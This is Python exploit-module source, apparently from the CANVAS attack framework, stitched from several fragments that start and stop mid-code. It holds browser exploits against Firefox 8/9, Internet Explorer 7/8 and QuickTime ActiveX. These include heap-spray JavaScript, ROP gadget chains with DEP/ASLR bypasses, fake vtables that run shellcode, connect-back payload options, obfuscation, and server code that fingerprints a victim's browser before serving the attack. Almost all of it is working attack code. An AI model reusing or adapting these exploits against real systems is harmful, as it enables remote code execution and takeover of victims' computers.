wp_urluencode(wp_randomstring(4)))
return filedata
def makefileXP(self):
sprayaddr = pack('<L', 0x0C101C0C)
sprayaddr += pack('<L', 0x77C1BB36) # pop - XP
depSc = pack('<L', 0x77C3A634)
depSc += self.wp_UniversalDEPBypassWinXP_VP((len(self.shellcode) + 8))
depSc += self.shellcode
depSc += wp_randomstring(2432 - len(depSc))
filedata = """<html>
<head>
<script>
var shellcode = unescape("PAYLOAD");
var targetsize = 0x40000;
var offset_length = 0x606;
for (var i=0; i < 0x800; i++)
{
var randomnumber1=Math.floor(Math.random()*90)+10;
var randomnumber2=Math.floor(Math.random()*90)+10;
var randomnumber3=Math.floor(Math.random()*90)+10;
var randomnumber4=Math.floor(Math.random()*90)+10;
var paddingstr = "%u" + randomnumber1.toString() + randomnumber2.toString();
paddingstr += "%u" + randomnumber3.toString() + randomnumber4.toString();
var padding = unescape(paddingstr);
while (padding.length < 0x1000) padding+= padding;
junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + shellcode;
single_sprayblock += padding.substring(0,0x800 - offset_length - shellcode.length);
while (single_sprayblock.length < targetsize) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (targetsize-6)/2);
varname = "var" + randomnumber1.toString() + randomnumber2.toString();
varname += randomnumber3.toString() + randomnumber4.toString();
thisvarname = "var " + varname + "= '" + sprayblock +"';";
eval(thisvarname);
}
function run() {
var attr = document.createAttribute("foo");
attr.value = "bar";
var ni = document.createNodeIterator(
attr, NodeFilter.SHOW_ALL,
{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }}
,false);
ni.nextNode();
ni.nextNode();
ni.previousNode();
attr.value = null;
const addr = unescape("RANDPAD");
var container = new Array();
var small = unescape("SPRAYADDR");
while (small.length != 30)
small += addr;
for (i = 0; i < 1024*1024*2; ++i)
container.push(unescape(small));
ni.referenceNode;
}
</script>
</head>
<body onload="run();">
</body>
</html>
"""
filedata = filedata.replace('PAYLOAD', wp_urluencode(depSc))
filedata = filedata.replace('SPRAYADDR', wp_urluencode(sprayaddr))
filedata = filedata.replace('RANDPAD',
wp_urluencode(wp_randomstring(4)))
return filedata
def makefile(self, browser, osversion):
if osversion == "Windows 2003":
self.log('WP> Serving Windows 2003 Exploit')
return self.makefile2003()
# Default to XP
self.log('WP> Serving Windows XP Exploit')
return self.makefileXP()
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
self.log('WP> User agent of connecting host: %s' % user_agent)
if not 'Firefox/9' in browser:
if not 'Firefox/8' in browser:
self.log('WP> Target browser invalid')
return 0
if clientheader.URL.count(self.filename):
self.log('WP> Serving exploit file')
data = self.makefile(browser, osversion)
if not data:
return None, None
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
filedata = self.makefile()
outputfile = wp_outputpath(self.filename)
self.log("WP> Opening %s for output" % outputfile)
fd = file(outputfile, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (outputfile))
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = '' # Shellcode is on heap or in dll
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# For IE7 .Net Shellcode
self.vProtect = True
self.pc = 0x44444444
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] # it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
#self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def heapSpray(self, payload, heapspraycode):
# This creates a heapspray of blocks that are 0x240000 (0x23f000 on Win7) in size
# almost gauruntees that our spray block sits at 0xxxxx1000 or other 100 byte boundary
heapprefix = wp_randomstring(220) # padding to 0x100 bytes
script = """
memory = new Array();
var hs = unescape("HEAPSPRAYCODE");
while(hs.length < 0x11F600) hs += hs;
hs = hs.substring(0, 0x11F600-DATALENGTH);
hs = unescape("PREFIX") + hs + unescape("PAYLOAD");
try{
for(var i = 0; i < 400; i++) {
memory[i]= hs.substring(0,hs.length);
}
}
catch(err)
{}
"""
script = script.replace('DATALENGTH', str((0x100 + len(payload)) / 2))
script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode))
script = script.replace('PREFIX', wp_urluencode(heapprefix))
script = script.replace('PAYLOAD', wp_urluencode(payload))
#Obfuscate the script code
if self.isClientD:
self.log("WP> Running jsObfuscator")
return self.jsObfuscator.obfuscate(script)
else:
return script
def makeTriggerIE8(self):
filedata = """
mem = new Array();
var ptr = unescape("%u1414%u1414");
while(ptr.length < #SIZE#) { ptr += ptr; }
ptr = ptr.slice(0, (#SIZE#)/2);
for(var i = 0; i < 0x3000; i++) { mem[i]= ptr.substring(0,ptr.length);}
for(var xi = 0; xi < 5; xi++) {document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>AAAAA</object>";}
for(var i = 0; i < 0x3000; i++) {mem[i+0x3000]= ptr.substring(0,ptr.length); }
document.body.innerHTML += "<a id='AAAAA' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >AAAAA</a>";
document.body.innerHTML += "Please wait for the page to load.";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>111_AA</strong>";
</SCRIPT>
</body>
</html>
"""
filedata = filedata.replace("#SIZE#", "0xDA")
return filedata
def makefileIE8_VistaWin7(self, stage):
# Exploit for IE 8 Windows 7/Vista
# This page loads java and uses sayonara
if stage == 1:
# Load Java
filedata = """
<object alt="Verify JRE Applet 2" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1">
<param name="type" value="application/x-java-applet" />
<param name="codebase" value="/jsp_utils/" />
<param name="code" value="jreVerify.class" />
<param name="jumpto" value="/en/download/installed.jsp?" />
<param name="pause" value="5000" />
</object>
<script>document.location="/PAGE2"</script>
"""
filedata = filedata.replace(
'PAGE2', self.filename.replace('.html', '.2.html'))
return filedata
elif stage == 2:
landingAddress = 0x14141414
heapspraycode = pack('<L', 0x7C341AF9) # RETN
heapspraycode += pack('<L', 0x7C341AF9) * 5 # RETN
heapspraycode += pack('<L', 0x7C341AF9) # RETN
heapspraycode += pack('<L', 0x7C341A14) * 26 # RETN 4
heapspraycode += pack('<L', 0x7C34E7BA) # Stack/Heap Flip
while len(heapspraycode) < (
0x100): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x7C341AF9) # RETN
# depbypass using sayonara
depbypass = self.wp_sayonaraASLRDEPBypass(
(len(self.shellcode) + 104))
# Set the payload
payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" *
100)
#pad the payload out to 0x100 bytes
payload += wp_randomstring(256 - (len(payload) % 256))
filedata = """
<html>
<body>
<script language="JavaScript">
"""
# script main heapspray code
filedata += self.heapSpray(payload, heapspraycode)
# Add the reset of the exploit trigger
filedata += self.makeTriggerIE8()
return filedata
def makeTriggerIE7(self, amount="0x3000"):
filedata = """
mem = new Array();
var ptr = unescape("%u1414%u1414");
while(ptr.length < #SIZE2#) { ptr += ptr; }
ptr2 = ptr.slice(0, (#SIZE2#/2));
ptr = ptr.slice(0, (#SIZE#/2));
for(var i = 0; i < #AMOUNT#; i++) {mem[i]= ptr.substring(0,ptr.length); }
for(var xi = 0; xi < 5; xi++) {document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>AAAAA</object>";}
for(var i = 0; i < 0x5000; i++) {mem[i+0x1000]= ptr2.substring(0,ptr2.length); }
document.body.innerHTML += "<a id='AAAAA' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >AAAAA</a>";
document.body.innerHTML += "Please wait for the page to load.";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>111_AA</strong>";
</SCRIPT>
</body>
</html>
"""
filedata = filedata.replace("#SIZE#", "0xa8")
filedata = filedata.replace("#SIZE2#", "0x112")
filedata = filedata.replace("#AMOUNT#", amount)
return filedata
def makefileIE7(self, stage):
# Exploit for Windows Vista IE 7
# .Net DLL ASLR/DEP Bypass
if stage == 1:
filedata = """
<html>
<object classid="OURDLL#a.b" height="1" width="1"></object>
<script>document.location="/PAGE2"</script>
</html>
"""
#"
filedata = filedata.replace('OURDLL',
self.filename.replace('.html', '.dll'))
filedata = filedata.replace(
'PAGE2', self.filename.replace('.html', '.2.html'))
return filedata
elif stage == 2:
landingAddress = 0x14141414
heapspraycode = pack('<L', landingAddress) # ptr
heapspraycode += pack('<L', landingAddress) # ptr
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
heapspraycode += pack('<L', self.pc) # Return to .Net DLL code
while len(heapspraycode) < (
0x100): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', self.pc) # JUNK
# Set the payload, payload is inside the loaded dll file
payload = ""
filedata = """
<html>
<title>Loading</title>
<body>
<script language="JavaScript">
"""
# script main heapspray code
filedata += self.heapSpray(payload, heapspraycode)
# Add the reset of the exploit trigger
filedata += self.makeTriggerIE7()
return filedata
def makefileWinXP(self, browser):
# Exploit for Windows XP (DEP Bypass)
landingAddress = 0x14141414
if browser == "MSIE 8.0":
heapspraycode = pack('<L', 0x77C21A57) # RETN
heapspraycode += pack('<L', 0x77C21A57) * 5 # RETN
heapspraycode += pack('<L', 0x77C21A57) # RETN
heapspraycode += pack('<L', 0x77C214DF) * 26 # RETN 4
heapspraycode += pack('<L',
0x77C15ED5) # Stack/Heap Flip (EAX->ESP)
while len(heapspraycode) < (
0x100): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x77C21A57) # RETN
else:
heapspraycode = pack('<L', 0x77C214DF) # RETN 4
heapspraycode += pack('<L', 0x77C21A57) # RETN
heapspraycode += pack('<L',
0x77C15ED5) # Stack/Heap Flip (EAX->ESP)
while len(heapspraycode) < (
0x100): # Build out to 0x100 byte blocks
heapspraycode += pack('<L', 0x77C21A57) # RETN
# dep bypass
depbypass = self.wp_UniversalDEPBypassWinXP_VP(len(self.shellcode) + 8)
# Set the payload
payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" *
100)
#pad the payload out to 0x100 bytes
payload += wp_randomstring(256 - (len(payload) % 256))
filedata = """
<html>
<body>
<script language="JavaScript">
"""
# script main heapspray code
filedata += self.heapSpray(payload, heapspraycode)
# Add the reset of the exploit trigger
if browser == "MSIE 8.0":
filedata += self.makeTriggerIE8()
else:
filedata += self.makeTriggerIE7("2500")
return filedata
def makefile(self, browser, osversion):
if osversion == "Windows XP":
self.log('WP> Serving Windows XP exploit')
return self.makefileWinXP(browser)
if browser == "MSIE 9.0":
#self.log('WP> Serving MSIE 9.0 exploit')
#return self.makefileIE8_VistaWin7(1)
return ""
if browser == "MSIE 8.0":
self.log('WP> Serving MSIE 8.0 exploit')
return self.makefileIE8_VistaWin7(1)
if browser == "MSIE 7.0":
self.log('WP> Serving MSIE 7.0 exploit')
return self.makefileIE7(1)
# Default to a non ASLR version
self.log('WP> Serving Non ASLR Exploit')
return self.makefileWinXP(browser)
def makesploit(self, clientheader, clientbody):
self.createShellcode()
# The main call from ClientD
from libs.spkproxy import header, body
h = header('SERVER')
b = body()
self.log('WP> ****************************************')
self.log("WP> URL Received: %s" % clientheader.URL)
user_agent = clientheader.getStrValue(['User-Agent'])
cookies = clientheader.getStrValue(['Cookie'])
# Get details
browser, osversion = wp_browserinfo(user_agent)
self.log('WP> OSVersion: %s' % osversion)
self.log('WP> Browser: %s' % browser)
self.log('WP> ')
#self.log('WP> User agent of connecting host: %s' % user_agent)
#self.log('WP> Cookies of connecting host: %s' % cookies)
if clientheader.URL.count(self.filename):
if cookies.count("SessionID"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
else:
self.log('WP> Serving exploit html file')
data = self.makefile(browser, osversion)
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('.dll')):
p = PElib()
if browser == "MSIE 7.0":
self.log('WP> Serving IE7 .Net DLL file')
self.vProtect = True # Needed for this type of payload
data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc)
self.vProtect = False # Reset this
else:
self.log('WP> Serving IE8 .Net DLL file')
data = p.createDotNETPEFileBuf("", self.pc)
b.setBody(data)
h.addHeader('Content-Type', 'application/octet-stream')
elif (clientheader.URL.count('.2.html')):
if cookies.count("SessionID2"):
self.log('WP> Exploit already sent to this client')
self.log('WP> Returning blank page')
data = ""
else:
self.log('WP> Serving exploit secondary file')
if browser == "MSIE 7.0":
data = self.makefileIE7(2)
else:
data = self.makefileIE8_VistaWin7(2)
b.setBody(data)
h.addHeader('Content-Type', 'text/html')
h.addHeader('Set-Cookie',
'SessionID2=%d' % self.jsObfuscator.getXORKey())
elif (clientheader.URL.count('iexplore.exe.config')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
elif (clientheader.URL.count('jreVerify.class')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
elif (clientheader.URL.count('favicon.ico')):
self.log('WP> Returning blank page')
b.setBody("")
h.addHeader('Content-Type', 'text/html')
else:
self.log('WP> Redirecting to self')
h.status = '302'
h.addHeader('Location', self.filename)
h.addHeader('Content-Type', 'text/html')
self.log('WP> ****************************************')
return h, b
def run(self):
if (self.version == 0):
filedata = self.makefile('', 'Windows XP')
elif (self.version == 1):
filedata = self.makefile('MSIE 7', '')
elif (self.version == 2):
filedata = self.makefile('MSIE 8', '')
self.log("WP> Opening %s" % (self.filename))
fd = file(self.filename, 'wb+')
fd.write(filedata)
fd.close()
self.log('WP> Wrote to %s' % (self.filename))
return 1
class theexploit(httpclientside):
def __init__(self):
httpclientside.__init__(self)
self.version = 0
self.name = NAME
self.setInfo(DESCRIPTION)
self.filename = "".join([choice(ascii_lowercase)
for x in range(8)]) + ".html"
# Set up our javascript obfuscator, this could be done in httpclientside class
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# we want clientd to give us a plugin dict
self.plugin_info = None
return
def is_vulnerable(self, info_dict):
"""
Check to make sure this is something we want to run. This is called by cliend.py
"""
if "MSIE" in info_dict['user_agent']:
return 50
return 0
def makefile(self, request_header=None):
"""
Generate the HTML to be included in the exploit file
"""
filedata = """
<html>
<head></head>
<body onload="setTimeout('exploit();', 1000)">
<object id="qt" classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"></object>
<div id="exploit"></div>
<script type="text/javascript">
"""
script = """
function hexa(val)
{
var str = new Number(val).toString(16);
while (str.length < 4)
str = "0" + str;
return str;
}
function myescape(addr)
{
var str = "";
str = "%u" + hexa(addr & 0xffff) + "%u" + hexa((addr >> 16) & 0xffff);
return unescape(str);
}
function qt_767()
{
// This is the bug
// eax is our pointer, we point it to our fake vtable
// 7750dc93 8b08 mov ecx,dword ptr [eax] ds:0023:80000000=????????
// 7750dc95 8d5508 lea edx,[ebp+8]
// 7750dc98 52 push edx
// 7750dc99 ff7510 push dword ptr [ebp+10h]
// 7750dc9c ff750c push dword ptr [ebp+0Ch]
// 7750dc9f 50 push eax
// 7750dca0 ff510c call dword ptr [ecx+0Ch]
//
// QuickTimeStreaming.qtx
// ROP Gadget 1:
//
// 6785FF86 94 XCHG EAX,ESP
// 6785FF87 5F POP EDI
// 6785FF88 5E POP ESI
// 6785FF89 C3 RETN
///
// ROP Gadget 2: this dereferences the address of VirtualAlloc from the IAT
// 677B0244 8B01 MOV EAX,DWORD PTR DS:[ECX]
// 677B0246 C3 RETN
///
// ROP Gadget 3: this calls VirtualAlloc(0, size, 0x1000, 0x40)
// 677A509E FFD0 CALL EAX
// 677A50A0 C3 RETN
//
/// ROP Gadget 4
// 678D4FD5 97 XCHG EAX,EDI
// 678D4FD6 C3 RETN
///
// ROP Gadget 5
// 677A9B4B 8BC7 MOV EAX,EDI
// 677A9B4D 5E POP ESI
// 677A9B4E C3 RETN
///
// ROP Gadget 6
// 677A1E27 59 POP ECX
// 677A1E28 C3 RETN
///
// ROP Gadget 7
// 678178D2 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
// 678178D4 5F POP EDI
// 678178D5 5E POP ESI
// 678178D6 C3 RETN
///
// ROP Gadget 8
// 677A509E FFD0 CALL EAX
// 677A50A0 C3 RETN
/// Break on 7750dc93 for debugging
// Sprayed address we can reach to.
// 20282CB8 20282CB8
self_address = 0x20282CB8;
gadget_1 = 0x6785FF86;
gadget_2 = 0x677B0244;
gadget_3 = 0x677A509E;
gadget_4 = 0x678D4FD5;
gadget_5 = 0x677A9B4B;
gadget_6 = 0x677A1E27;
gadget_7 = 0x678178D2;
gadget_8 = 0x677A509E;
valloc = 0x6791009C; // VirtualAlloc IAT Entry
fake_vtable = myescape(self_address); // edi = will point to this
fake_vtable += myescape(0xcafecafe); // dummy
fake_vtable += myescape(gadget_6); // pop crap from stack (this will skip gadget_1)
fake_vtable += myescape(gadget_1); // Get me ESP
fake_vtable += myescape(gadget_6); // ecx = VirtualAlloc@IAT
fake_vtable += myescape(valloc);
fake_vtable += myescape(gadget_2); // eax = VirtualAlloc
fake_vtable += myescape(gadget_3); // call VirtualAlloc(0, size, 0x1000, 0x40)
fake_vtable += myescape(0x0); // NULL
fake_vtable += myescape(0x10000); // size
fake_vtable += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE
fake_vtable += myescape(0x40); // PAGE_EXECUTE_READWRITE
fake_vtable += myescape(gadget_4); // edi = eax (valloced memory)
fake_vtable += myescape(gadget_5); // eax = edi (save it)
fake_vtable += myescape(self_address+84); // shellcode address
fake_vtable += myescape(gadget_6); // ecx = sizeof(shellcode)
fake_vtable += myescape(0x1000); // sizeof(shellcode)
fake_vtable += myescape(gadget_7); // memcpy
fake_vtable += myescape(0xbadc0ded); // dummy
fake_vtable += myescape(0xbadc0ded); // dummy
fake_vtable += myescape(gadget_8); // Call shellcode
fake_vtable += unescape("SHELLCODE"); // @84
var crapuccino = myescape(0xbadc0ded);
while(fake_vtable.length < 0x7fff00)
fake_vtable += fake_vtable;
h1 = [];
h1[0] = fake_vtable + crapuccino;
var i;
for (i = 1 ; i < 20 ; i++)
h1[i] = h1[0].substring(0, h1[0].length)
var object = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0">'
+ '<PARAM name="_Marshaled_pUnk" value="' + self_address + '"/>'
+ '</object>';
document.getElementById("exploit").innerHTML = object;
}
function qt_765()
{
// This is the bug
// eax is our pointer, we point it to our fake vtable
// 7750dc93 8b08 mov ecx,dword ptr [eax] ds:0023:80000000=????????
// 7750dc95 8d5508 lea edx,[ebp+8]
// 7750dc98 52 push edx
// 7750dc99 ff7510 push dword ptr [ebp+10h]
// 7750dc9c ff750c push dword ptr [ebp+0Ch]
// 7750dc9f 50 push eax
// 7750dca0 ff510c call dword ptr [ecx+0Ch]
//
// QuickTimeStreaming.qtx
// ROP Gadget 1:
//
// 673BEED5 94 XCHG EAX,ESP
// 673BEED6 5B POP EBX
// 673BEED7 59 POP ECX
// 673BEED8 C3 RETN
//
/// ROP Gadget 2:
//
// 673BC20E 5B POP EBX
// 673BC20F C3 RETN
///
// ROP Gadget 3: this dereferences the address of VirtualAlloc from the IAT
//
// 673B1F38 8B01 MOV EAX,DWORD PTR DS:[ECX]
// 673B1F3A C3 RETN
///
// ROP Gadget 4: this calls VirtualAlloc(0, size, 0x1000, 0x40)
// 6744568A FFD0 CALL EAX
// 6744568C C3 RETN
//
/// ROP Gadget 5
// 6743E26B 97 XCHG EAX,EDI
// 6743E26C 0100 ADD DWORD PTR DS:[EAX],EAX
// 6743E26E 8948 0C MOV DWORD PTR DS:[EAX+C],ECX
// 6743E271 C3 RETN
///
// ROP Gadget 6
// 67448AFA 8BC7 MOV EAX,EDI
// 67448AFC 5E POP ESI
// 67448AFD C3 RETN
///
// ROP Gadget 7
// 673B1122 59 POP ECX
// 673B1123 C3 RETN
///
// ROP Gadget 8
// 6743CD4F F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
// 6743CD51 5F POP EDI
// 6743CD52 5E POP ESI
// 6743CD53 C3 RETN
///
// ROP Gadget 9
// 673C79A5 FFE0 JMP EAX
//
/// Break on 7750dc93 for debugging
// Sprayed address we can reach to.
self_address = 0x10022C98;
gadget_1 = 0x673BEED5;
gadget_2 = 0x673BC20E
gadget_3 = 0x673B1F38;
gadget_4 = 0x6744568A;
gadget_5 = 0x6743E26B;
gadget_6 = 0x67448AFA;
gadget_7 = 0x673B1122;
gadget_8 = 0x6743CD4F;
gadget_9 = 0x673C79A5;
valloc = 0x674601AC; // VirtualAlloc IAT Entry
fake_vtable = myescape(0xcafecafe);
fake_vtable += myescape(self_address); // ecx@1 will point to this
fake_vtable += myescape(valloc); // ecx@2 will have VirtualAlloc@IAT
fake_vtable += myescape(gadget_2); // pop crap
fake_vtable += myescape(gadget_1); // Get me ESP
fake_vtable += myescape(gadget_3); // EAX = [IAT:VirtualAlloc]
fake_vtable += myescape(gadget_4); // call VirtualAlloc
fake_vtable += myescape(0x0); // NULL
fake_vtable += myescape(0x10000); // size
fake_vtable += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE
fake_vtable += myescape(0x40); // PAGE_EXECUTE_READWRITE
fake_vtable += myescape(gadget_5); // set edi = eax
fake_vtable += myescape(gadget_6); // set eax = edi ; set esi = shellcode
fake_vtable += myescape(self_address+76); // shellcode address
fake_vtable += myescape(gadget_7); // ecx = sizeof(shellcode)
fake_vtable += myescape(0x1000); // sizeof(shellcode)
fake_vtable += myescape(gadget_8); // memcpy
fake_vtable += myescape(0xbadc0ded); // dummy
fake_vtable += myescape(0xbadc0ded); // dummy
fake_vtable += myescape(gadget_9); // jmp to shellcode
fake_vtable += unescape("SHELLCODE"); // @76
var crapuccino = myescape(0xbadc0ded);
while(fake_vtable.length < 0x7fff00)
fake_vtable += fake_vtable;
h1 = [];
h1[0] = fake_vtable + crapuccino;
var i;
for (i = 1 ; i < 20 ; i++)
h1[i] = h1[0].substring(0, h1[0].length)
var object = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0">'
+ '<PARAM name="_Marshaled_pUnk" value="' + self_address + '"/>'
+ '</object>';
document.getElementById("exploit").innerHTML = object;
}
function exploit()
{
/// NOTE to the reader, I KNOW I've copied some parts of the exploit
/// that might be shared by all the versions of the exploit but this
/// way is easier to debug and extend.
var version = qt.GetQuickTimeVersion();
/// Versions 7.6.7 and 7.6.6 shoudl work with the same ROP
if(version == "7.6.7")
qt_767();
else if(version == "7.6.6")
qt_767();
else if(version == "7.6.5")
qt_765();
}
"""
script = script.replace('SHELLCODE', urluencode(self.shellcode))
#filedata += self.jsObfuscator.obfuscate(script)
filedata += script
filedata += """
</script>
</body>
</html>
"""
return filedata
def makesploit(self, clientheader, clientbody):
"""
Called automatically
"""
from libs.spkproxy import header, body
# header is used to store request and reponse headers
header = header('SERVER')
body = body()
if clientheader.URL.count(self.filename):
self.log('Serving HTML file')
# Create the shellcode (self.shellcode)
self.createShellcode()
# Create the HTML Contents
html = self.makefile(request_header=clientheader)
body.setBody(html)
header.addHeader('Content-Type', 'text/html')
header.addHeader('Set-Cookie',
'SessionID=%d' % self.jsObfuscator.getXORKey())
else:
self.log('Redirecting to self')
header.status = '302'
header.addHeader('Location', self.filename)
header.addHeader('Content-Type', 'text/html')
return header, body
def neededListenerTypes(self):
return self.clientSideListenerTypes()
def getArgs(self):
"""
Get the required parameters from the program that
ran the exploit (i.e. CANVAS GTK GUI or Command line)
"""
self.host = self.target.interface
self.getarg("filename")
self.getarg("language")
return
def displayVersions(self):
"""
XXX Called from the cmd line or canvas to show the available versions?
"""
for t in targets.keys():
print 'Version %d: %s' % (t, targets[t][0])
return
def run(self):
"""
Run is the firth method that is automatically executed by CANVAS
"""
# Populate the needed arguments of the exploit
self.getArgs()
# Build the html that triggers the vulnerability
filedata = self.makefile()
self.log('Opening %s for output' % (self.filename))
fd = file(self.filename, 'wb+')
fd.write(filedata)
fd.close()
self.debuglog('Wrote to %s' % (self.filename), color="red")
return 1
class theexploit(wp_exploit, httpclientside):
######################################################################################
## WP> Dialog Information
##########################s############################################################
PAYLOADS = [
"IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN",
"Execute Command"
]
# Clienside exploits default to HTTPMosdef PLAIN for clientD
DEFAULT_PAYLOAD = 2
def __init__(self):
wp_exploit.__init__(self)
httpclientside.__init__(self)
self.setInfo(DESCRIPTION)
self.setInfo(VERSION)
self.name = NAME
self.targets = targets
self.version = 0
self.use_universal = True
# We default these to false
self.HTTPMOSDEF = False
self.useSSLMOSDEF = False
self.isClientD = False
self.badstring = '' # Shellcode is on heap or in dll
#Ranomisze name for clientd
self.filename = "".join(
[random.choice(string.uppercase) for x in range(8)]) + ".html"
# HTTP Custom Stuff
self.jsObfuscator = JSObfuscator()
self.jsObfuscator.xorKeyFromCookie("SessionID")
# For IE7 .Net Shellcode
self.vProtect = True
self.pc = 0x44444444
return
def is_vulnerable(self, info_dict):
# Called from ClientD, if recon modules are enabled
# returns a value used to rank the exploit within attacking modules
"""
Check for IE
"""
self.isClientD = True
if "MSIE" in info_dict['user_agent']:
self.log("WP> Target has MSIE")
language = info_dict['plugins'].get("language", "")
if type(language) == type([]):
language = language[0] # it's a list in actuality
self.log("WP> language found: %s" % language)
if "en-us" in language:
return 95
else:
return 20
return 0
def usage(self):
self.wp_usage(targets, "-F <filename>")
return
def neededListenerTypes(self):
self.getArgs()
return self.wp_createWin32Listener()
def createShellcode(self):
self.getArgs()
#self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0]))
return self.wp_createShellcode()
def getArgs(self):
# If Called from clientD, update shellcode accordingly
if getattr(self, 'useSSLMOSDEF', False):
self.isClientD = True
self.DEFAULT_PAYLOAD = 1
else:
# Potentially called from httpserver update shellcode accordingly
if self.HTTPMOSDEF:
if self.useSSLMOSDEF:
self.DEFAULT_PAYLOAD = 1
else:
self.DEFAULT_PAYLOAD = 2
# Selected shell options
self.wp_getShellcodeType()
# If called from clientD there will be no target here
if self.target:
self.host = self.target.interface
self.filename = self.argsDict.get('filename', self.filename)
return
def displayVersions(self):
for t in targets.keys():
print 'WP> Version %d: %s' % (t, targets[t][0])
return
def makefileIE8_VistaWin7_part1(self):
# Exploit for IE 8 Windows 7/Vista
# This page loads a .Net DLL
# mscorie .Net DLL ASLR/DEP Bypass
filedata = """
<html>
<object classid="OURDLL" height="0" width="0"></object>
<iframe src=/page2.htm></iframe>
</html>
"""
filedata = filedata.replace('OURDLL',
self.filename.replace('.html', '.dll'))
return filedata
def makefileIE8_VistaWin7_part2(self):
# Exploit for IE 8 Windows 7/Vista
landingAddress = 0x126A1000 #0x126A1000
heapspraycode = pack('<L', 0x63F05761) #the slide of RETN
heapspraycode += pack('<L',
landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX]
heapspraycode += pack('<L',
0x63F0575B) # MSCORIE:(0x63f0575b XCHG EAX,ESP)
heapspraycode += pack('<L', landingAddress) # JUNKED
heapspraycode += pack('<L', 0x63F03E9B) # RETN 30
heapspraycode += pack('<L', 0x63F057D3) # RETN 0C
